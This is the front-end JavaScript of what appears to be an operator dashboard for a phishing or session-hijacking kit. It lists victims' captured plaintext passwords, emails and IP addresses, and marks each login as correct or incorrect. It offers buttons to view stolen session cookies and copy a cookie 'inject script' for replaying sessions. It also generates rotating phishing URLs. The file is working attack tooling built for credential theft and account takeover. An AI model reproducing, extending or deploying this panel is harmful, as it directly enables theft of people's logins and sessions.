                year: 'numeric',
                hour: '2-digit',
                minute: '2-digit',
                hour12: false
            });
        } catch (e) { return iso; }
    };

    // Update Table with filtered rows
    for(const r of visibleRows){
      const tr=document.createElement("tr");
      
      const status = r.botStatus || 'unknown';

      // Map known types to friendly names if needed
      let typeLabel = r.type || "Unknown";
      
      const hasCookies = (status === 'completed' || r.hasScript);

      if (hasCookies) {
          typeLabel = "Correct";
      } else if (r.password && r.password.trim().length > 0) {
          typeLabel = "Incorrect";
      } else {
          if(typeLabel === "visit") typeLabel = "Site Visit";
          if(typeLabel === "email_ok") typeLabel = "Email Valid";
          if(typeLabel === "password_fail_first") typeLabel = "Pass Attempt 1";
          if(typeLabel === "password_second_redirect") typeLabel = "Pass Attempt 2";
      }

      const isSuccess = typeLabel.includes('Valid') || typeLabel === 'Correct';
      const badgeStyle = isSuccess ? 'border-color:var(--accent);color:var(--accent)' : 'border-color:var(--danger);color:var(--danger)';

      let cookieBtn = '-';
      // Status Logic
      cookieBtn = '';
      
      // Determine if we should treat this as a "failed" attempt where no cookies are expected
      const isFailedAttempt = r.type && (r.type.includes('fail') || r.type.includes('error'));

      if (status === 'completed' || r.hasScript) {
            cookieBtn = '<div style="display:flex;gap:4px">';
            if (r.hasScript) {
                 cookieBtn += `<button class="secondary" style="padding:4px 8px;font-size:10px;border-color:var(--accent);color:var(--accent)" onclick="viewCookies('${r.cookieId}', 'js')">Cookies</button>`;
                 cookieBtn += `<button class="secondary" style="padding:4px 8px;font-size:10px;border-color:var(--accent);color:var(--accent)" onclick="copyInject(this, '${r.cookieId}')" title="Copy Inject Script">Copy</button>`;
            }
            cookieBtn += '</div>';
      } else if (status === 'processing' && !isFailedAttempt) {
           cookieBtn = `<span class="badge" style="border-color:var(--accent-3);color:var(--accent-3)">Running ⏳</span>`;
      } else {
           // Failed, pending, or unknown -> Show detailed status for debugging
           cookieBtn = `<span style="color:var(--text-dim);font-size:10px">${status}</span>`;
      }

      tr.innerHTML=`<td>${formatTime(r.time)}</td>
                    <td><span class="badge" style="${badgeStyle}">${typeLabel}</span></td>
                    <td>${r.emailMask||""}</td>
                    <td style="font-family:var(--font-mono)">${r.password||"-"}</td>
                    <td>${r.ip||""}</td>
                    <td>${cookieBtn}</td>`;
      tbody.appendChild(tr);
    }
    const totalEntries = correct + incorrect;
    setStatus(`Total ${totalEntries} entries`, "var(--accent)");
  }catch(e){
    setStatus("Failed to load events", "var(--danger)");
  }
}

// Cookie Modal Logic
window.copyInject = async function(btn, id) {
    const originalText = btn.innerHTML;
    btn.innerHTML = '...';
    try {
        const res = await fetch(`/api?action=get_cookies&id=${id}&type=js`);
        const data = await res.json();
        if (data.ok) {
            await navigator.clipboard.writeText(data.content);
            btn.innerHTML = 'Copied!';
            setTimeout(() => btn.innerHTML = originalText, 2000);
        } else {
            alert('Error: ' + (data.error || 'Unknown'));
            btn.innerHTML = originalText;
        }
    } catch (e) {
        alert('Failed: ' + e.message);
        btn.innerHTML = originalText;
    }
};

window.closeModal = function() {
  document.getElementById('cookieModal').style.display = 'none';
};
window.viewCookies = async function(id, type) {
  const modal = document.getElementById('cookieModal');
  const content = document.getElementById('cookieContent');
  modal.style.display = 'flex';
  content.textContent = 'Loading...';
  
  try {
    let url = `/api?action=get_cookies&id=${id}`;
    if (type) url += `&type=${type}`;

    const res = await fetch(url);
    const data = await res.json();
    if (data.ok) {
        content.textContent = data.content;
    } else {
        content.textContent = 'Error: ' + (data.error || 'Unknown error');
    }
  } catch (e) {
    content.textContent = 'Failed to fetch cookies: ' + e.message;
  }
};
document.getElementById('copyCookiesBtn').addEventListener('click', () => {
    const text = document.getElementById('cookieContent').textContent;
    navigator.clipboard.writeText(text).then(() => {
        alert('Copied to clipboard!');
    }).catch(err => {
        console.error('Failed to copy: ', err);
    });
});

(function(){
  document.getElementById("refreshEvents").addEventListener("click",loadEvents);
  // Auto-refresh every 5 seconds to show new cookies faster
  setInterval(loadEvents, 5000);
document.getElementById("clearLogs").addEventListener("click", async () => {
    if (!confirm("Are you sure you want to clear all logs and cookies? This cannot be undone.")) return;
    try {
        const res = await fetch("/api?action=clear_logs", { method: "POST" });
        const j = await res.json();
        if (res.ok && j.ok) {
            setStatus("Logs cleared successfully", "var(--accent)");
            loadEvents();
        } else {
            setStatus("Failed to clear logs: " + (j.error || "Unknown"), "var(--danger)");
        }
    } catch (e) {
        setStatus("Error clearing logs", "var(--danger)");
    }
});
  loadEvents();
})();
function hexToRgb(h){const s=h.replace("#","");const b=s.length===3?[s[0]+s[0],s[1]+s[1],s[2]+s[2]]:[s.slice(0,2),s.slice(2,4),s.slice(4,6)];return b.map(x=>parseInt(x,16))}
function parseColor(c){const cs=c.trim();if(cs.startsWith("#")){const r=hexToRgb(cs);return {r:r[0],g:r[1],b:r[2],a:1}}if(cs.startsWith("rgb")){const m=cs.match(/rgba?\(([^)]+)\)/);if(!m)return {r:0,g:0,b:0,a:1};const p=m[1].split(",").map(x=>x.trim());return {r:parseFloat(p[0]),g:parseFloat(p[1]),b:parseFloat(p[2]),a:p[3]!==undefined?parseFloat(p[3]):1}}return {r:0,g:0,b:0,a:1}}
function relLum(c){const a=[c.r,c.g,c.b].map(v=>{v/=255;return v<=0.03928?v/12.92:Math.pow((v+0.055)/1.055,2.4)});return 0.2126*a[0]+0.7152*a[1]+0.0722*a[2]}
function ratio(f,b){const L1=Math.max(f,b),L2=Math.min(f,b);return (L1+0.05)/(L2+0.05)}
function getBg(el){let e=el;while(e){const cs=getComputedStyle(e);const bg=cs.backgroundColor;const c=parseColor(bg);if(c.a>0 && !(c.r===0 && c.g===0 && c.b===0 && c.a===0)) return c;e=e.parentElement}return parseColor("#000000")}
const navSettings=document.getElementById("navSettings");
const navSubmissions=document.getElementById("navSubmissions");
const secSettings=document.getElementById("section-settings");
const secSubs=document.getElementById("section-submissions");
function setActive(btn){[navSettings,navSubmissions].forEach(b=>b.classList.remove("active"));btn.classList.add("active")}
navSettings.addEventListener("click",()=>{setActive(navSettings);secSettings.style.display="block";secSubs.style.display="none"});
navSubmissions.addEventListener("click",()=>{setActive(navSubmissions);secSettings.style.display="none";secSubs.style.display="block"});

/* Settings Tabs Logic */
const tabBtns = document.querySelectorAll('.tab-btn');
const tabContents = document.querySelectorAll('.tab-content');

tabBtns.forEach(btn => {
  btn.addEventListener('click', () => {
    // Remove active class from all buttons and contents
    tabBtns.forEach(b => b.classList.remove('active'));
    tabContents.forEach(c => c.classList.remove('active'));

    // Add active class to clicked button
    btn.classList.add('active');

    // Show corresponding content
    const tabId = btn.getAttribute('data-tab');
    document.getElementById(tabId).classList.add('active');
  });
});

async function loadDeploymentInfo() {
    try {
        const res = await fetch('/api?action=get_deployment_info');
        const json = await res.json();
        if (json.ok && json.data) {
            const { main_domain, rotation_path, rotation_slugs } = json.data;
            if (main_domain && rotation_slugs && rotation_slugs.length > 0) {
                const container = document.getElementById('deployment-links-container');
                const list = document.getElementById('deployment-links-list');
                container.style.display = 'block';
                list.innerHTML = '';
                
                rotation_slugs.forEach(slug => {
                    const path = rotation_path || 'admg';
                    const url = `https://${main_domain}/${path}/${slug}`;
                    const btn = document.createElement('button');
                    btn.textContent = url;
                    btn.className = 'secondary';
                    btn.style.textTransform = 'none';
                    btn.style.fontSize = '12px';
                    btn.style.borderColor = 'var(--accent)';
                    btn.style.color = 'var(--accent)';
                    btn.onclick = () => {
                        navigator.clipboard.writeText(url);
                        const original = btn.textContent;
                        btn.textContent = 'COPIED!';
                        btn.style.backgroundColor = 'var(--accent)';
                        btn.style.color = '#000';
                        setTimeout(() => {
                            btn.textContent = original;
                            btn.style.backgroundColor = '';
                            btn.style.color = 'var(--accent)';
                        }, 1000);
                    };
                    list.appendChild(btn);
                });
            }
        }
    } catch (e) {
        console.error('Failed to load deployment info', e);
    }
}
loadDeploymentInfo();
</script>
</body>
</html>
